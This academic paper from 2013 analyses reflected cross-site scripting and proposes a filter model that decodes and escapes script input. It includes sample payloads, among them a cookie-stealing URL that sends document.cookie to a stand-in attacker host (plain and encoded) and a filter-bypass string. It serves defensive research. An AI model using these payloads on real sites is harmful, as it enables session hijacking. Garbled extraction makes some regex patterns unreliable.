International Research Journal of Computer Science and Information Systems (IRJCSIS) Vol. 2(2) pp. 25-33, March, 2013 Available online http://www.interesjournals.org/IRJCSIS Copyright © 2013 International Research Journals Full Length Research Paper Reflected XSS Vulnerability Analysis Tanko Ishaya*1, Yunxi Zhang2 and Darren Stephens3 1 Department of Computer Science,University of Jos, Jos, Nigeria. University of Hull, Scarborough Campus, Filey Road, Scarborough, YO11 3AZ, United Kingdom. 2,3 Accepted February 26, 2013 The use of web applications has become an integral part of every aspect of human life. However, vulnerabilities within these systems have been (and would continue to be) a major concern in web application security. Amongst them, Cross Site Scripting (XSS) is a prevailing vulnerability, since they are generally easy to execute, but difficult to detect and prevent. There are three categories XSS attacks – DOM-based, stored and reflected attacks. Attackers commonly use reflected XSS as an initial attempt at hacking session tokens due to its simplicity among the three categories. This paper presents an evaluation of web browsers related vulnerabilities and the countermeasures available to web developers and proposes a model for dynamically enhancing reflected XSS protection mechanism. Keywords: Security, XSS vulnerability, XSS attacks, XSS protection mechanisms, Trustworthiness. 1. INTRODUCTION The use of web applications has become an integral part of every aspect of human life. It has become a dominant way to provide access to online services (Gollmann, 2008) and the JavaScript Language that was standardised by ECMA (ECMA-262, 2009) is widely used to enhance the dynamic client-side behaviour. The JavaScript code that is usually downloaded and automatically executed on-the-fly by an embedded interpreter has been a possible vector of attacks against web applications. Thus, these applications come with a large number of security challenges that often threatens the trustworthiness of web applications. While these security challenges have been (and are being) addressed, security issues within web applications are still a major concern and should be considered as a high priority within web applications (Ahmed, 2002; Taniar and Rahayu, 2003; Loo, 2007; Weske et al., 2007).White Hat Security stresses that 82% of sites have suffered one kind of web attack or the other (Network Security, 2008). A number of web sites are reported to be vulnerable to various attacks (Christey and Martin, 2007; Ollmann, 2008). The reason for this severe consequence is perhaps due to varying security background and experience of web application developers. *Corresponding Author Email: ishayat@unijos.edu.ng To protect a client-side from malicious JavaScript code, browsers use a sand-boxing mechanism that limits the script to only access resources associated with its origin site. Unfortunately, JavaScript security mechanisms may be confined by the sand-boxing mechanisms and conform to the same-origin policy, but still violets the security of the system, when a user is lured into downloading malicious JavaScript code (previously created by an attacker) from a trusted website – an exploitation technique that is often called a Cross-site Scripting (XSS) attack (Robert, 2010). XSS attack is currently number two in the 2010 OWASP Top Ten vulnerabilities (http://www.owasp.org/index.php/OWASP_Top_Ten_Proj ect). The vulnerability of XSS was up by 91%, meaning that nine out of ten web applications are vulnerable to such a flaw making it possible for attackers to access clients’ data without any authorised privileges (Stuttard and Pinto, 2008).Other attacks such as information leakage, broken access controls etc. are also occupying a high position. It has been pointed out that XSS attacks are detected by a number of commercial sites every month (Lee, 2002). One current approach for dealing with XSS attacks is fixing the server-side vulnerability, but this approach leaves the client open to abuse, if the vulnerable web site is unable to fix the security issue. Therefore, a complimentary approach of recognising malicious JavaScript code downloaded from a trusted web site in 26 Int. Res. J. Comput. Sci. Inform. Syst. order to protect client environment from XSS attacks is required. This should be able to dynamically filter and sanitise different malicious code input. This paper presents a model for creating such clientside solutions that would militate against reflected XSS attacks. The remainder of the paper are structured as follows: In Section 2, a review of XSS attacks has been presented, with an evaluation of the type of XSS attacks. Section 3 presents an evaluation of current challenges hindering filters from sanitising reflected XSS vulnerabilities. Conclusions of findings of characteristics of reflected XSS vulnerabilities are drawn in section 4. Section 5 presents a proposed model, and describes a technique used in identifying possible malicious reflected XSS attacks. Finally, Section 6 presents a conclusion and further work being carried out. 2. REVIEW OF XSS ATTACKS An XSS attack is an elevation of privilege attack that exploits clients’ ‘trust’ in a web server, where an attacker passes malicious code to the client via the trusted site, evading the client’s origin based security policy. These attacks can be persistent and non-persistent with the three main categories being: reflected XSS, stored XSS and DOM-based XSS. Many of these attacks take advantage of the authentication mechanisms employed by modern browsers that requires users to provide their token sin a web application only once per session. Upon initial authentication, browsers will catch the user's credentials and offer them on behalf of the user for every further request to the site until the session expires. They also take advantage of the loophole in the Same Origin Policy (SOP). 2.1. Reflected XSS Attacks Reflected (also known as non-persistent) XSS attacks exploit web site elements that echo client supplied data, such as forms. The vulnerability allows an attacker to generate a crafted URL (containing malicious script code) and lure the victim into believing that the URL is credible. The crafted URL is normally sent to victims by emails, web advertising and other means of social engineering. Once a victim navigates to the URL, the attacker's code is executed using the victim's tokens (taking advantage of the implicit authentication mechanism). This type of attack is usually used to read stored passwords, cookies, log keystrokes and change the contents of the page. The URL http://targetwebsite.co.uk/login.php?user=<script>alert(do cument.cookie);</script> is an example of how an attacker uses reflected XSS vulnerabilities to steal the session token from a victim. The victim's browser would interpret the response as an HTML page containing a piece of JavaScript code. When executed, it would allow cookies belonging to www.targetwebsite.co.uk to be stolen. Cookies are then used as a session token for authenticating with a server. There are three key issues to be analysed from this scenario. Firstly, a huge majority of ordinary users have no knowledge of whether or not a URL is trustworthy. Secondly, the nature of web applications causes them to be vulnerable, since malicious code can be initiated from the client side by anyone (OWASP, 2009).Thirdly, script code will execute, unless there is a filter in the web application that can check its trustworthiness. 2.2. Stored XSS Attacks A stored XSS attack (also known as persistent XSS) (Kemp, 1998)allows attackers to permanently store a malicious JavaScript code on the target server (e.g. in a database or message forum).Attackers then use the code to perform a number of browser-based attacks- including capturing sensitive information from application users, hijacking user’s browsers, port-scanning to deliver browser-based exploits. Stored XSS attacks focus on an input that is stored in the backend, and the input is then displayed on the application. It would be particularly dangerous, if users with high privileges suffered this kind of attacks. 2.3. DOM-Based XSS Attacks In comparison with reflected XSS vulnerabilities and stored XSS vulnerabilities, DOM-based XSS vulnerabilities are slightly different, as this vulnerability relies on the use of the Document Object Model (DOM) of a page. Such an attack will occur, if the JavaScript code in the page can access a URL parameter, and use it to write HTML to the page (Klein, 2005). However, since it is a relatively new branch of XSS, it is not yet very widespread in real web applications so far (OWASP, 2008). 3. DIFFICULTY ATTACKS IN DEFENDING AGAINST XSS The YGN Ethical Hacker Group (YGN Ethical Hacker Group, 2008)stresses that XSS vulnerabilities are quite difficult to defend against completely, since there are a number of variables, which need to be taken into consideration. Due to the existence of the variables, it is difficult to address the XSS vulnerabilities with a single generalised solution. Instead, a number of mechanisms that can help reduce the likelihood are required. The following sections present a highlight of some of these variables/factors. Ishaya et al. 27 3.1. Encoding Schemes 3.3. Browser versions An arbitrary URL with script code that are not encoded can easily be recognised, if users have basic knowledge of XSS vulnerabilities. However, if the URL is encoded, it will become more bewildering for users to distinguish such an attack. The example below is to show the difference between the URL in a plain text and that in an encoded format. The plain-text URL is, http://portal.example/index.php?sessionid=12312312&us ername=<script>document.location='http://attackerhost.e xample /cgibin/cookiesteal.cgi?'+document.cookie</script> and the relevant encoded URL is http://portal.example/index.php?sessionid=12312312 &username=%3C%73%63%72%69%70%74%3E%64%6 F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74 %69%6F%6E%3D%27%68%74%74%70%3A%2F%2F% 61%74%74%61%63%6B%65%72%68%6F%73%74%2E %65%78%61%6D%70%6C%65%2F%63%67%69%2D% 62%69%6E%2F%63%6F%6F%6B%69%65%73%74%65 %61%6C%2E%63%67%69%3F%27%2B%64%6F%63% 75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3 C%2F%73%63%72%69%70%74%3E Usually, a majority of users do not even think of what the encoded URL might mean. The aim of using the encoded URL is to bypass the XSS filter within web applications with a higher likelihood of success. The client browser is one of the factors that can generate XSS vulnerabilities. A couple of script code causing potential XSS vulnerabilities demonstrate that some script code can run on different browsers, whilst others can only run on a certain browser version, In addition, latest browser versions are more invulnerable to different attacks than previous versions. 3.2. Anti-comment design flaws Anti-Comment is a measure, which is capable of filtering some malicious code by commenting them out. However, intelligent attackers can design certain type of code to circumvent this filter. Ollmann, (2008) provides some example code that can comment malicious code out. In the filter, code like “<script>code</script>” will be detected, and be added comment tags outside it to convert the code to: <!-code //code here will not execute //because it is inside the //comment tags //--> Due to the poor design of Anti-Comments, attackers can design the code like ><//--><script>code</script><!--><eventually, after the comment tags are added, new code will become <!--><//--> //comment <script>code</script> //malicious code will still execute <!--><//--> //comment The flaws within the use ofa poor anti-Comment design can allow attackers to successfully send maliciouscode, which can execute successfully as usual. 3.4. Potentially dangerous tags A typical XSS vulnerability is triggered, when a user clicks on a link. Some XSS code embedded in some tags (such as IMG or IFRAME) can execute automatically, if code are sent by e-mail. This type of XSS vulnerabilities is regarded as more devastating, since the code can run without being activated. 3.5. Default recognition of non-standard XHTML code One of the advantages of browsers is that non-standard XHTML code can be recognised. Code like <input type=text> does not comply with the W3C standard, as no quotation marks exist outside the value ‘text’ of the attribute ‘type’, and the lack of a slash cannot signify the end of the ‘input’ tag. However, a majority of current browsers (e.g. IE, Firefox etc.) are designed to understand non-standard XHTML code and sometimes to treat them as appropriate. Therefore, the kindness of browsers also brings some vulnerability attackers can exploit. 3.6. Variant code Another factor is the variation of code that is new to filters, so it will not be treated as malicious. New variant XSS code can be generated to bypass the validation of filters within web applications. Current methods for creating new variant XSS code are to use different encoding schemes or to use quotes as described in Fisher, (2004). From the analysis of these varying factors, web developers need to understand and provide approaches for defending against XSS vulnerabilities. The current obstacle in essence is that a number of loose points should be considered which seem to be relatively messy so that web developers may feel frustrated, if they need to fuse them together. Further more, if the security level in the GET method and the POST method are the same, the GET method may be preferred due to its strength of processing requests more quickly. Therefore, a robust filter model that can sanitise malicious script code in the 28 Int. Res. J. Comput. Sci. Inform. Syst. GET method for guarding against reflected XSS vulnerabilities is no doubta clear desirability. Thus, the next section presents a proposed filtering model. 4. EXPERIMENTATIONS CHARACTERISTICS OF VULNERABILITIES FOR DETECTING REFLECTED XSS In order to develop this conceptual model, a series of tests were undertaken within four browsers (IE7, IE8, Firefox 3.5.2, Safari 4.0.3, Opera 9.6.4), which were the latest version at the time of the research. The experimentation results could demonstrate some characteristics of reflected XSS vulnerabilities, and conclusions are drawn in section IV-A: • Direct inputting of malicious code in a URL or refreshing the page can be detected in IE8, but cannot be recognised, if the same code is contained in a link. • Opera 9.6.4 will suffer more variations of reflected XSS vulnerabilities. 4.1. Characteristics of reflected XSS attacks A number of reflected XSS attacks include the following: 1). Encoding Schemes The five encoding schemes used in the tests were HTMLdecimal, HTML-hex, URL, UTF-8 and HTML special encodings for five mark-ups (Skorkin, 2009). Main characteristics include: • The characteristic of the HTML-Encoding-decimal is to use “&#” as a starting tag, and a semicolon is used as an end tag along with the decimal number in between.(e.g. &#65; is the encoded format of the ASCII No.65- uppercase A) • The characteristic of the HTML-Encoding-hex is similar to the decimal format with the starting tag “&#x”. The end tag is also a semicolon, and a hex number is used in between. For instance, &#x65is the encoded format of the ASCII No.65 - uppercase A. • The characteristic of the URL-Encoding and the UTF-8 are similar to each other. The per cent sign “%” is used as a starting tag followed by a hexadecimal number. The difference between them is that URL-encoding uses uppercase A-F, where as lower case a-f is adopted by the UTF-8 encoding. However, there is no end tag (e.g. semicolon) in the two encoding schemes. • The length of the encoded character is longer than that of the original character. The fifth encoding scheme is the HTML encoding, which defines five special representations for HTML mark-ups. 2). Special ASCII Characters Special ASCII characters in order of decimal numbers (e.g. No.9 horizontal tab (HT), No.10 line feed (LF), No.11 vertical tab (VT), No.12 form feed (FF), No.13 carriage return (CR) and No.32 (SPACE)) will display bizarrely in a web page. Thus, the second test is to identify how they will bed is played in different browsers, if they are encoded in four different encoding schemes. • IE7, Firefox 3.5.2 and Safari 4.0.3 will decode both decimal and hex-decimal formats of ASCII and filter them automatically. The browsers display them as nil. The URL and UTF-8 will not be decoded and will be displayed directly. • The majority of test results in Opera 9.64 are the same as those in Firefox 3.5.2 and Safari 4.0.3, except that the result of FF is different. • The two results VT and FF in IE8 will not pop up a window, which is different from those in other browsers. • The most important result is that all the browsers (the certain version chosen in the test) can understand both the standard format and non-standard format. 1) Variations of script code • The script code have to begin with a starting tag “<script>” and an end tag “</script>” with no space between every two letters, except the space before the “>” in both the starting tag and the end tag. • The starting tag and end tag can be uppercase, lowercase or even mixed. • Browsers can understand five special characters encoded by the HTML-encoding. For instance, the character “<” is encoded as “&lt;”. • Browsers can understand characters encoded by the HTML-encoding-decimal or by the HTMLencoding-hex, and the encoded character with or without a semicolon as the end tag can be recognised by browsers. • Browsers can understand characters encoded by the URL encoding or by the UTF-8 encoding, which are not in the tag part but in the content part. • Browsers will filter HT, LF and CR, if they are encoded by the HTML-encoding-decimal or by the HTMLencoding-hex. • SPACE encoded by the HTML-encoding-decimal or the HTML-encoding-hex will be treated as space, so it will not execute, if it is in the tag part. • VT and FF encoded by the HTML-encoding-decimal or by the HTML-encoding-hex will be filtered as space in the majority of browsers, except Safari 4.0.3 that will treat them as nil. • Browsers cannot understand five characters encoded by the HTML-encoding without a semicolon as an end tag. • Calling an external script file can trigger reflected XSS vulnerabilities. Ishaya et al. 29 Figure 1. Conceptual Model of the Reflected XSS Filter 5. THE PROPOSED MODEL The conceptual model of filtering reflected XSS vulnerabilities is designed based on the analysis of the results of experimentation tests, and some conclusions shown in section 4. The model as shown in Figure 1 below consists of a number of steps, each step leading to the other: 5.1. Browser Checking The first step is to detect the browser type and version. Since the latest browser version can behave more invulnerable to some attacks (see the conclusion in section 4.1), and majority of users may not check the latest browser version when they use them. 5.2. Request Length Checking The second step is to check the request length sent from the user browser. The aim is to see whether it is longer than the pre-set maximum length. If an attacker attempts to use an encoding scheme to hide the original request, the request length must be longer than that of the original 30 Int. Res. J. Comput. Sci. Inform. Syst. Figure 2. Step one of the analysis mechanism request displaying in plaintext (see section 4.1). 5.3. Request Decoding The third step is to analyse the request, and to check how many encoding schemes have been used. The relevant encoding scheme will then be used to decode the encoded characters. An Attacker usually encodes a request, so that users are unable to ascertain their validity. Another case is that the traditional decoding functionality in web applications is assumed that the request est is encoded by one encoding scheme, so the same scheme will be used to decode it. However, if different parts of one request are encoded by different encoding schemes (see section 4.1), the traditional decoding functionality will fail in sanitising mali malicious script code. 1.) Analysis Mechanism Since characters encoded by encoding schemes can be arranged randomly and repeatedly. This section introduces an analysis mechanism, which is capable of distinguishing different schemes. The procedure of the analysis mechanism is clarified as follows: After a request is sent to the web application, it will be divided into several parts by parameters, and the values of one parameter is one part. For instance, a request like http://xxx.co.uk/index.php?id=abc&pwd=123 /index.php?id=abc&pwd=123 will be divided into two parts, since there exist two parameters id and pwd along with values abc and 123 respectively. Each part will then be checked through the analysis mechanism. A pointer is set to the first character of the part. It will check whether a character is a special character of one of the pre-set set standards. If it is, a certain number (the maximum length of the sample among the pre-set set standards) of characters following it will be fetched to match with the pre-set set standards s one by one. As long as a part or all of characters can be matched with one of the pre-set set standards, these characters will be set as a group sent to an input-output output matching table. The output will be stored in a new container, and the pointer will move to the character next to the last character of the group. If the character pointed by the pointer does not match any one of the pre-set set standards, the character will be stored in the container, and the pointer moves to the next character. The entire procedure will continue until the pointer is pointing at the last character of the part. Limitation: The analysis mechanism proposed here can only work within the scenario with the following prerequisites: The form/style of each pre-set pre standard is distinctt especially starting with a typical character. Each pre-set set standard has its exact maximum length. The partial procedure is illustrated in figures 2, 3 and 4. 2). Application of the Analysis Mechanism This section explains how the decoding functionality can be achieved by using the analysis mechanism to filter the encoded URL. First, the pre--set standards should be defined by calculating the length ranges of five encoding schemes, which are listed below based on the set of characteristics in section IVA4. Group one: • HTML-Encoding: 4 (&lt;)-6(&quot;). 6(&quot;). Ishaya et al. 31 Figure 3. Step two of the analysis mechanism Figure 4.Step Step three of the analysis mechanism HTML-Encoding-Decimal: 3(&#9)-6(&#126;) 6(&#126;) HTML-Encoding-Hex: 4(&#x9)-6(&#x7E;) 6(&#x7E;) Group two: • URL-Encoding: 2(%9)-3(%7E) • UTF-8: 2(%9)-3(%7e) The maximum length ranges for the two groups are six and three respectively. As the pointer is pointing at the first character, only five characterss following it are needed for the first group, and two for the second group. The regular expressions of five encoding schemes are used as the pre-set set standards due to its powerful strength for matching strings of two given texts. They are designed based on the set of characteristics as presented in section IV-A4. A4. However, two of the three can still be recognised by browsers even if the semicolon is missing. Combing these characters and that of five encoding schemes together, the pre-set set standards are design designed as follows: • HTML-Encoding: Encoding: /&[aglmopqstu]{2,4};/. • HTML-Encoding-Decimal: /&#[\d]{1,3};?/. d]{1,3};?/. • HTML-Encoding-Hex: /&#x[\x00-\xFF];?/. xFF];?/. • URL-Encoding and UTF-8-Encoding: Encoding: /%[ /%[\x00\xFF]/. The special character used in the decoding • • mechanism is “&”” or “%” due to the characteristics of the regular expression above. Each encoding-scheme encoding character table is used as a specific input-output input matching table, and the container is named as “sanitisedText”. The partial procedure is illustrated in figures 5, 6 and 7 below. 5.4. Malicious Code Checking and Escaping The fourth step aims to check the request string to see whether it does conform to the characteristics of reflected XSS vulnerabilities. From the conclusions in section 4.1that all of lowercase, uppercase and mixed case of the scripting tag can execute, the request should be converted into single case for convenience of the analysis. Conclusions as shown in section 4.1 demonstrate that ASCII 9-13 13 can be interpreted into space or nil by browsers. For or the sake of convenience when utilising the analysis mechanism, they should be removed as well. Conclusions shown in section 4.1indicate that both pure script code and external script files can execute with a complete pair of tags “<script></script>”, butt cannot execute, if there is space 32 Int. Res. J. Comput. Sci. Inform. Syst. Figure 5. First Step of the analysis mechanism Figure 6. Second Step of the analysis mechanism Figure 7. Third Step of the analysis mechanism between “<” and “script” in the starting tag; thus, the solution is as long as characters like “<script” can be found, space is inserted after the character “<” to break the balance of the pair tags intentionally. 6. CONCLUSION AND FUTURE WORK An implementation of the conceptual model running on Windows Vista Home Premium (service Pack 2) has Ishaya et al. 33 been developed for an evaluation. The procedure of the verification has been divided into two phases: The first phase:(a) Execute the browser checking function and (b) Execute the request length checking function. The second phase:(a) Display the original request,(b) Execute the request decoding function,(c)Display the result request after decoding function,(d) Execute the request checking function,(e) Display the result request after the checking function,(f). Execute the request escaping function and (g) Display the result request after the escaping function. The reason for separating the second phase from the first phase is that the following functionality will not execute, if the second step in the first phase works. In other words, the functionalities of all the steps in the second phase will not work, so their effects cannot display. The result of the first phase was that testing data did not execute if the pre-set maximum length was less than any one of these requests’ lengths within four browsers with different versions. The browser version could be detected correctly as well. Therefore, the first phase was verified as successful. By evaluating testing data in the second phase, all of them were escaped at step f effectively. Thus, the conceptual model has been proved to be effective enough in discovering various malicious script code and filtering them accordingly. The strengths of the model are a). It can identify five encoding-schemes introduced in this paper successfully as well as those special characters like space, ASCII No.9-13 etc. Proper sanitisation will execute to escape potential script code tags in the request to invalidate the inner malicious script code. If new encoding-schemes with a distinct starting and end tag can be recognised by browsers, they can be adopted into the filter as anew decoding scheme easily. The analysis mechanism created in this paper can be utilised not only for decoding, but for more functionalities only if the conditions within it can be fulfilled correctly like pre-set standard, pre-defined special character etc. The weakness of the model is that only four representative browsers have been used so far, and new versions of these browsers have been published since the test were conducted. Therefore, there is no guarantee that results presented here will be the same, if they are used with new versions of these browsers. Future work will focus on how the model can be applied to new versions of these browsers. REFERENCES Ahmed M (2002). ASP.NET Web Developer’s Guide, Rockland: Syngress Publishing, Inc. Christey S, Martin R (2007). Vulnerability type distributions in CVE. ECMA-262 (2009). ECMA Script Language Specification. Fisher J (2004). Cross Site Scripting in VBulletin forum software. Gollmann D (2008). Securing Web applications. In: Information Security Technical Report 13 (2008 )1-9. Kemp A (1998). Persistent Client State HTTP Cookies. Klein A (2005). DOM Based Cross Site Scripting or XSS Of the Third Kind. Lee P (2002). Cross-site scripting. Use a custom tag library to encode dynamic content. Loo A (2007). Peer-to-Peer Computing Building Supercomputers with Web Technologies. Springer. Network Security (2008). Web security flaws up. Network Security, 2008(9). 20. Ollmann G (2008). HTML Code Injection and Cross-site scripting Understanding the cause and effect of CSS (XSS) Vulnerabilities. OWASP (2008). OWASP Testing Guide V3.0. OWASP (2009). Cross-site-scripting. Robert A (2010). Cross Site Scripting. Skorkin A (2009). Different Types Of Encoding Schemes – A Primer. Stuttard D, Pinto M (2008). The Web Application Hacker’s handbook: Discovering and Exploiting Security Flaws. Indianapolis: Wiley Publishing, Inc. Taniar D,Rahayu J (2003). Web-Powered Databases. London: Idea Group Publishing. Weske M,Hacid M,Godart C (2007). Web Information Systems Engineering – WISE 2007 Workshops. Berlin Heidelberg: SpringerVerlag. YGN Ethical Hacker Group (2008). What malicious things XSS can do.